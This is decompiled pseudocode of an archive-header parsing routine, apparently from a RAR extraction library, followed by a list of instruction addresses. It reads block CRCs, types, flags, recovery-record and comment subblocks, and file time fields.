				intOrPtr* _t708;
				intOrPtr _t718;

				E00A4EB78(0xa626a5, _t708);
				E00A4EC50(0x2024);
				_t516 = __ecx;
				 *((intOrPtr*)(_t708 + 0x14)) = __ecx;
				E00A3CB83(_t708 + 0x1c, __ecx);
				 *(_t708 + 0x10) = 0;
				 *((intOrPtr*)(_t708 - 4)) = 0;
				_t657 = 7;
				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
					L7:
					 *((char*)(_t708 + 0x5a)) = 0;
					L8:
					_push(_t657);
					E00A3CD8A();
					__eflags =  *(_t708 + 0x34);
					if( *(_t708 + 0x34) == 0) {
						L5:
						E00A33FFC(_t516, _t639);
						L131:
						E00A315FB(_t708 + 0x1c);
						 *[fs:0x0] =  *((intOrPtr*)(_t708 - 0xc));
						return  *(_t708 + 0x10);
					}
					 *(_t516 + 0x21fc) = E00A3CBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x220c) = 0;
					_t688 = E00A3CBAF(_t708 + 0x1c) & 0x000000ff;
					_t329 = E00A3CBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x2204) = _t329;
					 *(_t516 + 0x220c) = _t329 >> 0x0000000e & 0x00000001;
					_t533 = E00A3CBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x2208) = _t533;
					 *(_t516 + 0x2200) = _t688;
					__eflags = _t533 - _t657;
					if(_t533 >= _t657) {
						_t640 = 2;
						_t334 = _t688 - 0x73;
						__eflags = _t334;
						if(_t334 == 0) {
							 *(_t516 + 0x2200) = 1;
							_t688 = 1;
							__eflags = 1;
							L20:
							 *(_t516 + 0x21f4) = _t688;
							__eflags = _t688 - 0x75;
							if(_t688 == 0x75) {
								L23:
								_t335 = 6;
								L25:
								_push(_t335);
								E00A3CD8A();
								_t337 = E00A31983(_t516,  *(_t516 + 0x2208));
								asm("adc ecx, 0x0");
								 *((intOrPtr*)(_t516 + 0x6cc0)) = _t337 +  *((intOrPtr*)(_t516 + 0x6cb8));
								 *(_t516 + 0x6cc4) =  *(_t516 + 0x6cbc);
								_t537 =  *(_t516 + 0x2200);
								 *(_t708 + 0x18) = _t537;
								_t340 = _t537 - 1;
								__eflags = _t340;
								if(_t340 == 0) {
									_t659 = _t516 + 0x2220;
									E00A3AD5E(_t659);
									_t539 = 5;
									memcpy(_t659, _t516 + 0x21fc, _t539 << 2);
									 *(_t516 + 0x2234) = E00A3CBC6(_t708 + 0x1c);
									_t640 = E00A3CBFB(_t708 + 0x1c);
									 *(_t516 + 0x2238) = _t640;
									 *(_t516 + 0x6ccd) =  *(_t516 + 0x2228) & 0x00000001;
									 *(_t516 + 0x6ccc) =  *(_t516 + 0x2228) >> 0x00000003 & 0x00000001;
									_t548 =  *(_t516 + 0x2228);
									 *(_t516 + 0x6ccf) = _t548 >> 0x00000002 & 0x00000001;
									 *(_t516 + 0x6cd3) = _t548 >> 0x00000006 & 0x00000001;
									 *(_t516 + 0x6cd4) = _t548 >> 0x00000007 & 0x00000001;
									__eflags = _t640;
									if(_t640 != 0) {
										L117:
										_t354 = 1;
										L118:
										 *((char*)(_t516 + 0x6cd0)) = _t354;
										 *(_t516 + 0x223c) = _t548 >> 0x00000001 & 0x00000001;
										_t550 = _t548 >> 0x00000004 & 0x00000001;
										__eflags = _t550;
										 *(_t516 + 0x6cd1) = _t548 >> 0x00000008 & 0x00000001;
										 *(_t516 + 0x6cd2) = _t550;
										L119:
										_t657 = 7;
										L120:
										_t361 = E00A3CCAC(_t708 + 0x1c, 0);
										__eflags =  *(_t516 + 0x21fc) - (_t361 & 0x0000ffff);
										if( *(_t516 + 0x21fc) == (_t361 & 0x0000ffff)) {
											L130:
											 *(_t708 + 0x10) =  *(_t708 + 0x34);
											goto L131;
										}
										_t364 =  *(_t516 + 0x2200);
										__eflags = _t364 - 0x79;
										if(_t364 == 0x79) {
											goto L130;
										}
										__eflags = _t364 - 0x76;
										if(_t364 == 0x76) {
											goto L130;
										}
										__eflags = _t364 - 5;
										if(_t364 != 5) {
											L128:
											 *((char*)(_t516 + 0x6cdc)) = 1;
											E00A36D83(0xa71098, 3);
											__eflags =  *((char*)(_t708 + 0x5a));
											if(__eflags == 0) {
												goto L130;
											}
											E00A32021(__eflags, 4, _t516 + 0x32, _t516 + 0x32);
											 *((char*)(_t516 + 0x6cdd)) = 1;
											goto L131;
										}
										__eflags =  *(_t516 + 0x45c6);
										if( *(_t516 + 0x45c6) == 0) {
											goto L128;
										}
										 *0xa63278();
										_t371 =  *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0x14))))() - _t657;
										__eflags = _t371;
										asm("sbb edx, ecx");
										 *0xa63278(_t371, _t640, 0);
										 *((intOrPtr*)( *_t516 + 0x10))();
										 *(_t708 + 0x5b) = 1;
										do {
											_t374 = E00A39892(_t516);
											asm("sbb al, al");
											_t377 =  !( ~_t374) &  *(_t708 + 0x5b);
											 *(_t708 + 0x5b) = _t377;
											_t657 = _t657 - 1;
											__eflags = _t657;
										} while (_t657 != 0);
										__eflags = _t377;
										if(_t377 != 0) {
											goto L130;
										}
										goto L128;
									}
									_t354 = 0;
									__eflags =  *(_t516 + 0x2234);
									if( *(_t516 + 0x2234) == 0) {
										goto L118;
									}
									goto L117;
								}
								_t378 = _t340 - 1;
								__eflags = _t378;
								if(_t378 == 0) {
									L35:
									__eflags = _t537 - 2;
									_t68 = (0 | _t537 == 0x00000002) - 1; // -1
									_t665 = (_t68 & 0x00002350) + 0x2298 + _t516;
									 *(_t708 + 0x4c) = _t665;
									E00A3ACC4(_t665, 0);
									_t560 = 5;
									memcpy(_t665, _t516 + 0x21fc, _t560 << 2);
									_t694 =  *(_t708 + 0x4c);
									_t668 =  *(_t708 + 0x18);
									_t562 =  *(_t694 + 8);
									 *(_t694 + 0x1098) =  *(_t694 + 8) & 1;
									 *(_t694 + 0x1099) = _t562 >> 0x00000001 & 1;
									 *(_t694 + 0x109b) = _t562 >> 0x00000002 & 1;
									 *(_t694 + 0x10a0) = _t562 >> 0x0000000a & 1;
									_t395 = _t562 & 0x00000010;
									__eflags = _t668 - 2;
									if(_t668 != 2) {
										L38:
										_t643 = 0;
										__eflags = 0;
										 *(_t708 + 0x5b) = 0;
										L39:
										 *((char*)(_t694 + 0x10f0)) =  *(_t708 + 0x5b);
										_t516 =  *((intOrPtr*)(_t708 + 0x14));
										__eflags = _t668 - 2;
										if(_t668 == 2) {
											L41:
											_t396 = _t643;
											L42:
											 *(_t694 + 0x10fa) = _t396;
											_t563 = _t562 & 0x000000e0;
											__eflags = _t563 - 0xe0;
											 *((char*)(_t694 + 0x10f1)) = 0 | _t563 == 0x000000e0;
											__eflags = _t563 - 0xe0;
											if(_t563 != 0xe0) {
												_t644 =  *(_t694 + 8);
												_t400 = 0x10000 << (_t644 >> 0x00000005 & 0x00000007);
												__eflags = 0x10000;
											} else {
												_t400 = _t643;
												_t644 =  *(_t694 + 8);
											}
											 *(_t694 + 0x10f4) = _t400;
											 *(_t694 + 0x10f3) = _t644 >> 0x0000000b & 0x00000001;
											 *(_t694 + 0x10f2) = _t644 >> 0x00000003 & 0x00000001;
											 *((intOrPtr*)(_t694 + 0x14)) = E00A3CBFB(_t708 + 0x1c);
											 *((intOrPtr*)(_t708 + 0x54)) = E00A3CBFB(_t708 + 0x1c);
											 *((char*)(_t694 + 0x18)) = E00A3CBAF(_t708 + 0x1c);
											 *(_t694 + 0x1070) = 2;
											 *((intOrPtr*)(_t694 + 0x1074)) = E00A3CBFB(_t708 + 0x1c);
											 *(_t708 + 0x44) = E00A3CBFB(_t708 + 0x1c);
											 *(_t694 + 0x1c) = E00A3CBAF(_t708 + 0x1c) & 0x000000ff;
											 *((char*)(_t694 + 0x20)) = E00A3CBAF(_t708 + 0x1c) - 0x30;
											 *(_t708 + 0x50) = E00A3CBC6(_t708 + 0x1c) & 0x0000ffff;
											_t413 = E00A3CBFB(_t708 + 0x1c);
											_t647 =  *(_t694 + 0x1c);
											 *(_t708 + 0x48) = _t413;
											 *(_t694 + 0x24) = _t413;
											__eflags = _t647 - 0x14;
											if(_t647 < 0x14) {
												__eflags = _t413 & 0x00000010;
												if((_t413 & 0x00000010) != 0) {
													 *((char*)(_t694 + 0x10f1)) = 1;
												}
											}
											 *(_t694 + 0x109c) = 0;
											__eflags =  *(_t694 + 0x109b);
											if( *(_t694 + 0x109b) == 0) {
												L57:
												_t414 =  *((intOrPtr*)(_t694 + 0x18));
												 *(_t694 + 0x10fc) = 2;
												__eflags = _t414 - 3;
												if(_t414 == 3) {
													L61:
													 *(_t694 + 0x10fc) = 1;
													L62:
													 *(_t694 + 0x1100) = 0;
													__eflags = _t414 - 3;
													if(_t414 == 3) {
														__eflags = ( *(_t708 + 0x48) & 0x0000f000) - 0xa000;
														if(( *(_t708 + 0x48) & 0x0000f000) == 0xa000) {
															__eflags = 0;
															 *(_t694 + 0x1100) = 1;
															 *((short*)(_t694 + 0x1104)) = 0;
														}
													}
													__eflags = _t668 - 2;
													if(_t668 == 2) {
														L67:
														_t415 = 0;
														goto L68;
													} else {
														_t415 = 1;
														__eflags =  *(_t694 + 0x24);
														if( *(_t694 + 0x24) < 0) {
															L68:
															 *((char*)(_t694 + 0x10f8)) = _t415;
															_t418 =  *(_t694 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t418;
															 *(_t694 + 0x10f9) = _t418;
															if(_t418 == 0) {
																__eflags =  *((intOrPtr*)(_t708 + 0x54)) - 0xffffffff;
																_t640 = 0;
																_t669 = 0;
																_t141 =  *((intOrPtr*)(_t708 + 0x54)) == 0xffffffff;
																__eflags = _t141;
																_t419 = _t418 & 0xffffff00 | _t141;
																L74:
																 *(_t694 + 0x109a) = _t419;
																 *(_t708 + 0x5b) = _t419;
																 *((intOrPtr*)(_t694 + 0x1058)) = 0 +  *((intOrPtr*)(_t694 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t694 + 0x105c)) = _t669;
																asm("adc edx, ecx");
																 *(_t694 + 0x1060) = 0 +  *((intOrPtr*)(_t708 + 0x54));
																__eflags =  *(_t708 + 0x5b);
																 *(_t694 + 0x1064) = _t640;
																if( *(_t708 + 0x5b) != 0) {
																	 *(_t694 + 0x1060) = 0x7fffffff;
																	 *(_t694 + 0x1064) = 0x7fffffff;
																}
																_t424 =  *(_t708 + 0x50);
																_t670 = 0x1fff;
																__eflags = _t424 - 0x1fff;
																if(_t424 < 0x1fff) {
																	_t670 = _t424;
																}
																E00A3CC5D(_t708 + 0x1c, _t708 - 0x2030, _t670);
																_t427 = 0;
																__eflags =  *(_t708 + 0x18) - 2;
																 *((char*)(_t708 + _t670 - 0x2030)) = 0;
																_t585 = ((0 |  *(_t708 + 0x18) == 0x00000002) - 0x00000001 & 0x00002350) + 0x22c0 + _t516;
																__eflags =  *(_t708 + 0x18) - 2;
																 *((intOrPtr*)(_t708 + 0x54)) = _t585;
																if( *(_t708 + 0x18) != 2) {
																	E00A41B84(_t708 - 0x2030, _t585, 0x800);
																	_t431 =  *((intOrPtr*)(_t694 + 0xc)) -  *(_t708 + 0x50);
																	__eflags =  *(_t694 + 8) & 0x00000400;
																	_t671 = _t431 - 0x20;
																	if(( *(_t694 + 8) & 0x00000400) != 0) {
																		_t671 = _t431 - 0x28;
																	}
																	__eflags = _t671;
																	if(_t671 > 0) {
																		E00A320BD(_t694 + 0x1028, _t671);
																		_t676 = _t694 + 0x1028;
																		_t431 = E00A53E49(E00A3CC5D(_t708 + 0x1c,  *_t676, _t671),  *((intOrPtr*)(_t708 + 0x54)), L"RR");
																		__eflags = _t431;
																		if(_t431 == 0) {
																			__eflags =  *((intOrPtr*)(_t694 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t694 + 0x102c)) >= 0x14) {
																				_t609 =  *_t676;
																				_t184 = _t609 + 0xb; // 0x7500
																				asm("cdq");
																				_t695 =  *_t184 & 0x000000ff;
																				_t185 = _t609 + 0xa; // 0x750025
																				asm("cdq");
																				_t697 = (_t695 << 8) + ( *_t185 & 0x000000ff);
																				_t190 = _t609 + 9; // 0x75002500
																				asm("adc edi, edx");
																				asm("cdq");
																				_t699 = (_t697 << 8) + ( *_t190 & 0x000000ff);
																				_t195 = _t609 + 8; // 0x250068
																				asm("adc edi, edx");
																				asm("cdq");
																				_t701 = (_t699 << 8) + ( *_t195 & 0x000000ff);
																				asm("adc edi, edx");
																				 *(_t516 + 0x21d8) = _t701 << 9;
																				 *(_t516 + 0x21dc) = ((((_t640 << 0x00000020 | _t695) << 0x8 << 0x00000020 | _t697) << 0x8 << 0x00000020 | _t699) << 0x8 << 0x00000020 | _t701) << 9;
																				 *0xa63278();
																				_t469 = E00A40264( *(_t516 + 0x21d8),  *(_t516 + 0x21dc),  *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0x14))))(), _t640);
																				 *(_t516 + 0x21e0) = _t469;
																				 *(_t708 + 0x48) = _t469;
																				_t470 = E00A4EBA0(_t468, _t640, 0xc8, 0);
																				asm("adc edx, [ebx+0x21dc]");
																				_t431 = E00A40264(_t470 +  *(_t516 + 0x21d8), _t640, _t468, _t640);
																				_t612 =  *(_t708 + 0x48);
																				_t694 =  *(_t708 + 0x4c);
																				__eflags = _t431 - _t612;
																				if(_t431 > _t612) {
																					_t431 = _t612 + 1;
																					 *(_t516 + 0x21e0) = _t612 + 1;
																				}
																			}
																		}
																	}
																	_t432 = E00A53E49(_t431,  *((intOrPtr*)(_t708 + 0x54)), L"CMT");
																	__eflags = _t432;
																	if(_t432 == 0) {
																		 *((char*)(_t516 + 0x6cce)) = 1;
																	}
																} else {
																	_t640 = 0;
																	 *_t585 = 0;
																	__eflags =  *(_t694 + 8) & 0x00000200;
																	if(( *(_t694 + 8) & 0x00000200) != 0) {
																		E00A36976(_t708);
																		_t478 = E00A53E90(_t708 - 0x2030) + 1;
																		__eflags = _t670 - _t478;
																		if(_t670 > _t478) {
																			__eflags = _t478 + _t708 - 0x2030;
																			E00A36986(_t708, _t708 - 0x2030, _t670, _t478 + _t708 - 0x2030, _t670 - _t478,  *((intOrPtr*)(_t708 + 0x54)), 0x800);
																		}
																		_t585 =  *((intOrPtr*)(_t708 + 0x54));
																		_t427 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t585 - _t427;
																	if( *_t585 == _t427) {
																		_push(1);
																		_push(0x800);
																		_push(_t585);
																		_push(_t708 - 0x2030);
																		E00A402BA();
																	}
																	E00A32134(_t516, _t694);
																}
																__eflags =  *(_t694 + 8) & 0x00000400;
																if(( *(_t694 + 8) & 0x00000400) != 0) {
																	E00A3CC5D(_t708 + 0x1c, _t694 + 0x10a1, 8);
																}
																E00A4140E( *(_t708 + 0x44));
																__eflags =  *(_t694 + 8) & 0x00001000;
																if(( *(_t694 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t516 + 0x6cc0)) = E00A33EFB( *((intOrPtr*)(_t516 + 0x6cc0)),  *(_t516 + 0x6cc4),  *((intOrPtr*)(_t694 + 0x1058)),  *((intOrPtr*)(_t694 + 0x105c)), 0, 0);
																	 *(_t516 + 0x6cc4) = _t640;
																	 *(_t708 + 0x44) =  *(_t694 + 0x10f2);
																	_t437 = E00A3CCAC(_t708 + 0x1c,  *(_t708 + 0x44));
																	__eflags =  *_t694 - (_t437 & 0x0000ffff);
																	if( *_t694 != (_t437 & 0x0000ffff)) {
																		 *((char*)(_t516 + 0x6cdc)) = 1;
																		E00A36D83(0xa71098, 1);
																		__eflags =  *((char*)(_t708 + 0x5a));
																		if(__eflags == 0) {
																			E00A32021(__eflags, 0x1c, _t516 + 0x32,  *((intOrPtr*)(_t708 + 0x54)));
																		}
																	}
																	goto L119;
																} else {
																	_t442 = E00A3CBC6(_t708 + 0x1c);
																	 *_t708 = _t516 + 0x32d8;
																	 *((intOrPtr*)(_t708 + 4)) = _t516 + 0x32e0;
																	 *((intOrPtr*)(_t708 + 8)) = _t516 + 0x32e8;
																	__eflags = 0;
																	_t672 = 0;
																	 *((intOrPtr*)(_t708 + 0xc)) = 0;
																	_t447 = _t442 & 0x0000ffff;
																	 *(_t708 + 0x50) = 0;
																	 *(_t708 + 0x44) = _t447;
																	do {
																		_t593 = 3;
																		_t520 = _t447 >> _t593 - _t672 << 2;
																		__eflags = _t520 & 0x00000008;
																		if((_t520 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t708 + _t672 * 4);
																		if( *(_t708 + _t672 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t672;
																		if(__eflags != 0) {
																			E00A4140E(E00A3CBFB(_t708 + 0x1c));
																		}
																		E00A41218( *(_t708 + _t672 * 4), _t640, _t708, __eflags, _t708 - 0x30);
																		__eflags = _t520 & 0x00000004;
																		if((_t520 & 0x00000004) != 0) {
																			_t249 = _t708 - 0x1c;
																			 *_t249 =  *(_t708 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t597 = 0;
																		 *(_t708 - 0x18) = 0;
																		_t521 = _t520 & 0x00000003;
																		__eflags = _t521;
																		if(_t521 <= 0) {
																			L109:
																			_t450 = _t597 * 0x64;
																			__eflags = _t450;
																			 *(_t708 - 0x18) = _t450;
																			E00A4146A( *(_t708 + _t672 * 4), _t640, _t708 - 0x30);
																			_t447 =  *(_t708 + 0x44);
																		} else {
																			_t673 = 3;
																			_t675 = _t673 - _t521 << 3;
																			__eflags = _t675;
																			do {
																				_t455 = (E00A3CBAF(_t708 + 0x1c) & 0x000000ff) << _t675;
																				_t675 = _t675 + 8;
																				_t597 =  *(_t708 - 0x18) | _t455;
																				 *(_t708 - 0x18) = _t597;
																				_t521 = _t521 - 1;
																				__eflags = _t521;
																			} while (_t521 != 0);
																			_t672 =  *(_t708 + 0x50);
																			goto L109;
																		}
																		L110:
																		_t672 = _t672 + 1;
																		 *(_t708 + 0x50) = _t672;
																		__eflags = _t672 - 4;
																	} while (_t672 < 4);
																	_t516 =  *((intOrPtr*)(_t708 + 0x14));
																	goto L112;
																}
															}
															_t669 = E00A3CBFB(_t708 + 0x1c);
															_t484 = E00A3CBFB(_t708 + 0x1c);
															__eflags =  *((intOrPtr*)(_t708 + 0x54)) - 0xffffffff;
															_t640 = _t484;
															if( *((intOrPtr*)(_t708 + 0x54)) != 0xffffffff) {
																L72:
																_t419 = 0;
																goto L74;
															}
															__eflags = _t640 - 0xffffffff;
															if(_t640 != 0xffffffff) {
																goto L72;
															}
															_t419 = 1;
															goto L74;
														}
														goto L67;
													}
												}
												__eflags = _t414 - 5;
												if(_t414 == 5) {
													goto L61;
												}
												__eflags = _t414 - 6;
												if(_t414 < 6) {
													 *(_t694 + 0x10fc) = 0;
												}
												goto L62;
											} else {
												_t648 = _t647 - 0xd;
												__eflags = _t648;
												if(_t648 == 0) {
													 *(_t694 + 0x109c) = 1;
													goto L57;
												}
												_t650 = _t648;
												__eflags = _t650;
												if(_t650 == 0) {
													 *(_t694 + 0x109c) = 2;
													goto L57;
												}
												_t651 = _t650 - 5;
												__eflags = _t651;
												if(_t651 == 0) {
													L54:
													 *(_t694 + 0x109c) = 3;
													goto L57;
												}
												__eflags = _t651 == 6;
												if(_t651 == 6) {
													goto L54;
												}
												 *(_t694 + 0x109c) = 4;
												goto L57;
											}
										}
										__eflags = _t395;
										_t396 = 1;
										if(_t395 != 0) {
											goto L42;
										}
										goto L41;
									}
									__eflags = _t395;
									if(_t395 == 0) {
										goto L38;
									}
									 *(_t708 + 0x5b) = 1;
									_t643 = 0;
									goto L39;
								}
								_t488 = _t378 - 1;
								__eflags = _t488;
								if(_t488 == 0) {
									goto L35;
								}
								__eflags = _t488 == 0;
								if(_t488 == 0) {
									_t624 = 5;
									memcpy(_t516 + 0x45a8, _t516 + 0x21fc, _t624 << 2);
									_t653 =  *(_t516 + 0x45b0);
									 *(_t516 + 0x45c4) =  *(_t516 + 0x45b0) & 0x00000001;
									_t628 = _t653 >> 0x00000001 & 0x00000001;
									_t640 = _t653 >> 0x00000003 & 0x00000001;
									 *(_t516 + 0x45c5) = _t628;
									 *(_t516 + 0x45c6) = _t653 >> 0x00000002 & 0x00000001;
									 *(_t516 + 0x45c7) = _t640;
									__eflags = _t628;
									if(_t628 != 0) {
										 *((intOrPtr*)(_t516 + 0x45bc)) = E00A3CBFB(_t708 + 0x1c);
									}
									__eflags =  *(_t516 + 0x45c7);
									if( *(_t516 + 0x45c7) != 0) {
										_t498 = E00A3CBC6(_t708 + 0x1c) & 0x0000ffff;
										 *(_t516 + 0x45c0) = _t498;
										 *(_t516 + 0x6cf0) = _t498;
									}
									goto L119;
								} else {
									__eflags =  *(_t516 + 0x2204) & 0x00008000;
									if(( *(_t516 + 0x2204) & 0x00008000) != 0) {
										 *((intOrPtr*)(_t516 + 0x6cc0)) =  *((intOrPtr*)(_t516 + 0x6cc0)) + E00A3CBFB(_t708 + 0x1c);
										asm("adc dword [ebx+0x6cc4], 0x0");
									}
									goto L120;
								}
							}
							__eflags = _t688 - 1;
							if(_t688 != 1) {
								L24:
								_t335 = _t533 - 7;
								goto L25;
							}
							__eflags =  *(_t516 + 0x2204) & 0x00000002;
							if(( *(_t516 + 0x2204) & 0x00000002) == 0) {
								goto L24;
							}
							goto L23;
						}
						_t501 = _t334 - 1;
						__eflags = _t501;
						if(_t501 == 0) {
							 *(_t516 + 0x2200) = _t640;
							_t688 = _t640;
							goto L20;
						}
						_t502 = _t501 - 6;
						__eflags = _t502;
						if(_t502 == 0) {
							_push(3);
							L17:
							_pop(_t503);
							 *(_t516 + 0x2200) = _t503;
							_t688 = _t503;
							goto L20;
						}
						__eflags = _t502 != 1;
						if(_t502 != 1) {
							goto L20;
						} else {
							_push(5);
							goto L17;
						}
					} else {
						E00A320D7(_t516);
						goto L131;
					}
				}
				_t639 =  *((intOrPtr*)(__ecx + 0x6cd8)) + _t657;
				asm("adc eax, ecx");
				_t718 =  *((intOrPtr*)(__ecx + 0x6cbc));
				if(_t718 < 0 || _t718 <= 0 &&  *((intOrPtr*)(__ecx + 0x6cb8)) <= _t639) {
					goto L7;
				} else {
					 *((char*)(_t708 + 0x5a)) = 1;
					E00A33E6D(_t516);
					 *0xa63278(_t708 + 0x40, 8);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0xc))))() == 8) {
						_t707 = _t516 + 0x1038;
						E00A3603A(_t707, 0, 4,  *((intOrPtr*)(_t516 + 0x21d4)) + 0x6024, _t708 + 0x40, 0, 0, 0, 0);
						 *((intOrPtr*)(_t708 + 0x3c)) = _t707;
						goto L8;
					}
					goto L5;
				}
			}

0x00a32874
0x00a3287e
0x00a32885
0x00a3288c
0x00a3288f
0x00a32898
0x00a3289b
0x00a3289e
0x00a328a5
0x00a32923
0x00a32923
0x00a32926
0x00a32926
0x00a3292a
0x00a3292f
0x00a32933
0x00a328ec
0x00a328ee
0x00a332da
0x00a332dd
0x00a332eb
0x00a332f6
0x00a332f6
0x00a32943
0x00a32949
0x00a32958
0x00a32960
0x00a32966
0x00a32971
0x00a3297c
0x00a3297f
0x00a32985
0x00a3298b
0x00a3298d
0x00a3299f
0x00a329a0
0x00a329a0
0x00a329a3
0x00a329d1
0x00a329db
0x00a329db
0x00a329dc
0x00a329dc
0x00a329e2
0x00a329e5
0x00a329f5
0x00a329f7
0x00a329fd
0x00a329fd
0x00a32a01
0x00a32a0e
0x00a32a1f
0x00a32a22
0x00a32a28
0x00a32a2e
0x00a32a36
0x00a32a39
0x00a32a39
0x00a32a3c
0x00a33159
0x00a33161
0x00a33168
0x00a3316f
0x00a3317c
0x00a3318e
0x00a33193
0x00a33199
0x00a331ab
0x00a331b1
0x00a331be
0x00a331cb
0x00a331d8
0x00a331de
0x00a331e0
0x00a331ed
0x00a331ed
0x00a331ef
0x00a331ef
0x00a331fb
0x00a3320b
0x00a3320b
0x00a3320e
0x00a33214
0x00a3321a
0x00a3321c
0x00a3321d
0x00a33222
0x00a3322a
0x00a33230
0x00a332d4
0x00a332d7
0x00000000
0x00a332d7
0x00a33236
0x00a3323c
0x00a3323f
0x00000000
0x00000000
0x00a33245
0x00a33248
0x00000000
0x00000000
0x00a3324e
0x00a33251
0x00a332a6
0x00a332ad
0x00a332b4
0x00a332b9
0x00a332bd
0x00000000
0x00000000
0x00a332c6
0x00a332cb
0x00000000
0x00a332cb
0x00a33253
0x00a3325a
0x00000000
0x00000000
0x00a33263
0x00a33271
0x00a33271
0x00a33274
0x00a3327b
0x00a33283
0x00a33286
0x00a3328a
0x00a3328c
0x00a33293
0x00a33297
0x00a3329a
0x00a3329d
0x00a3329d
0x00a3329d
0x00a332a2
0x00a332a4
0x00000000
0x00000000
0x00000000
0x00a332a4
0x00a331e2
0x00a331e4
0x00a331eb
0x00000000
0x00000000
0x00000000
0x00a331eb
0x00a32a42
0x00a32a42
0x00a32a45
0x00a32b0a
0x00a32b0c
0x00a32b14
0x00a32b23
0x00a32b27
0x00a32b2a
0x00a32b31
0x00a32b3a
0x00a32b3c
0x00a32b40
0x00a32b46
0x00a32b4b
0x00a32b57
0x00a32b64
0x00a32b71
0x00a32b79
0x00a32b7c
0x00a32b7f
0x00a32b8c
0x00a32b8c
0x00a32b8c
0x00a32b8e
0x00a32b91
0x00a32b94
0x00a32b9a
0x00a32b9d
0x00a32ba0
0x00a32ba8
0x00a32ba8
0x00a32baa
0x00a32baa
0x00a32bb5
0x00a32bb7
0x00a32bbc
0x00a32bc2
0x00a32bc8
0x00a32bd1
0x00a32be1
0x00a32be1
0x00a32bca
0x00a32bca
0x00a32bcc
0x00a32bcc
0x00a32be3
0x00a32bf9
0x00a32bff
0x00a32c0d
0x00a32c18
0x00a32c23
0x00a32c26
0x00a32c38
0x00a32c46
0x00a32c51
0x00a32c61
0x00a32c6c
0x00a32c72
0x00a32c77
0x00a32c7a
0x00a32c7d
0x00a32c80
0x00a32c83
0x00a32c85
0x00a32c87
0x00a32c89
0x00a32c89
0x00a32c87
0x00a32c92
0x00a32c98
0x00a32c9e
0x00a32ce3
0x00a32ce3
0x00a32ce6
0x00a32cf0
0x00a32cf2
0x00a32d04
0x00a32d04
0x00a32d0e
0x00a32d0e
0x00a32d14
0x00a32d16
0x00a32d20
0x00a32d25
0x00a32d27
0x00a32d29
0x00a32d33
0x00a32d33
0x00a32d25
0x00a32d3a
0x00a32d3d
0x00a32d46
0x00a32d46
0x00000000
0x00a32d3f
0x00a32d3f
0x00a32d41
0x00a32d44
0x00a32d48
0x00a32d48
0x00a32d54
0x00a32d54
0x00a32d56
0x00a32d5c
0x00a32d89
0x00a32d8d
0x00a32d8f
0x00a32d91
0x00a32d91
0x00a32d91
0x00a32d94
0x00a32d94
0x00a32d9a
0x00a32da2
0x00a32da8
0x00a32daf
0x00a32db5
0x00a32db7
0x00a32dbd
0x00a32dc1
0x00a32dc7
0x00a32dce
0x00a32dd4
0x00a32dd4
0x00a32dda
0x00a32ddd
0x00a32de2
0x00a32de4
0x00a32de6
0x00a32de6
0x00a32df3
0x00a32dfa
0x00a32dfc
0x00a32e00
0x00a32e17
0x00a32e19
0x00a32e1d
0x00a32e20
0x00a32ea4
0x00a32eac
0x00a32eaf
0x00a32eb6
0x00a32eb9
0x00a32ebb
0x00a32ebb
0x00a32ebe
0x00a32ec0
0x00a32ecd
0x00a32ed3
0x00a32eeb
0x00a32ef2
0x00a32ef4
0x00a32efa
0x00a32f01
0x00a32f07
0x00a32f09
0x00a32f0d
0x00a32f0e
0x00a32f12
0x00a32f1a
0x00a32f1e
0x00a32f20
0x00a32f24
0x00a32f26
0x00a32f2e
0x00a32f30
0x00a32f34
0x00a32f36
0x00a32f3e
0x00a32f42
0x00a32f4b
0x00a32f56
0x00a32f5c
0x00a32f78
0x00a32f88
0x00a32f8e
0x00a32f91
0x00a32f9c
0x00a32fa4
0x00a32fa9
0x00a32fac
0x00a32faf
0x00a32fb1
0x00a32fb3
0x00a32fb6
0x00a32fb6
0x00a32fb1
0x00a32f01
0x00a32ef4
0x00a32fc4
0x00a32fcb
0x00a32fcd
0x00a32fcf
0x00a32fcf
0x00a32e22
0x00a32e22
0x00a32e24
0x00a32e27
0x00a32e2e
0x00a32e33
0x00a32e44
0x00a32e46
0x00a32e48
0x00a32e5d
0x00a32e67
0x00a32e67
0x00a32e6c
0x00a32e6f
0x00a32e6f
0x00a32e6f
0x00a32e71
0x00a32e74
0x00a32e76
0x00a32e78
0x00a32e7d
0x00a32e84
0x00a32e85
0x00a32e85
0x00a32e8d
0x00a32e8d
0x00a32fd6
0x00a32fdd
0x00a32feb
0x00a32feb
0x00a32ff9
0x00a32ffe
0x00a33005
0x00a330dd
0x00a330fe
0x00a33107
0x00a33113
0x00a33119
0x00a33121
0x00a33123
0x00a33130
0x00a33137
0x00a3313c
0x00a33140
0x00a3314f
0x00a3314f
0x00a33140
0x00000000
0x00a3300b
0x00a3300e
0x00a3301c
0x00a33025
0x00a3302e
0x00a33031
0x00a33033
0x00a33035
0x00a33038
0x00a3303a
0x00a3303d
0x00a33040
0x00a33042
0x00a3304a
0x00a3304c
0x00a3304f
0x00000000
0x00000000
0x00a33051
0x00a33056
0x00000000
0x00000000
0x00a33058
0x00a3305a
0x00a33069
0x00a33069
0x00a33076
0x00a3307b
0x00a3307e
0x00a33080
0x00a33080
0x00a33080
0x00a33080
0x00a33083
0x00a33085
0x00a33088
0x00a33088
0x00a3308b
0x00a330b7
0x00a330b7
0x00a330b7
0x00a330be
0x00a330c5
0x00a330ca
0x00a3308d
0x00a3308f
0x00a33092
0x00a33092
0x00a33095
0x00a330a2
0x00a330a4
0x00a330aa
0x00a330ac
0x00a330af
0x00a330af
0x00a330af
0x00a330b4
0x00000000
0x00a330b4
0x00a330cd
0x00a330cd
0x00a330ce
0x00a330d1
0x00a330d1
